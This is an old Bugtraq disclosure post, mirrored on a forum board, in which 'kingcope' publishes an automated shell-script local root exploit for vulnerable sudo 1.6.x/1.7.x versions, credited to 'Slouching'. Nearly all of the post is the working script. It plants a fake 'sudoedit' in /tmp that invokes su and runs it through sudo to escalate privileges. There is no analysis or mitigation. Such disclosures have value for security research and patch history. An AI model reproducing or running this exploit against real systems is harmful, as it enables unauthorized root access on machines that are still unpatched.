Todd Miller Sudo local root exploit discovered by Slouching

看板Bugtraq作者時間16年前 (2010/03/03 06:32), 編輯推噓0(000)
留言0則, 0人參與, 最新討論串1/5 (看更多)
Just for the record. ---snip--- #!/bin/sh # Tod Miller Sudo 1.6.x before 1.6.9p21 and 1.7.x before 1.7.2p4 # local root exploit # March 2010 # automated by kingcope # Full Credits to Slouching echo Tod Miller Sudo local root exploit echo by Slouching echo automated by kingcope if [ $# != 1 ] then echo "usage: ./sudoxpl.sh <file you have permission to edit>" exit fi cd /tmp cat > sudoedit << _EOF #!/bin/sh echo ALEX-ALEX su /bin/su /usr/bin/su _EOF chmod a+x ./sudoedit sudo ./sudoedit $1 --snip--- cheers, kingcope
文章代碼(AID): #1BZP7YnE (Bugtraq)
討論串 (同標題文章)
文章代碼(AID): #1BZP7YnE (Bugtraq)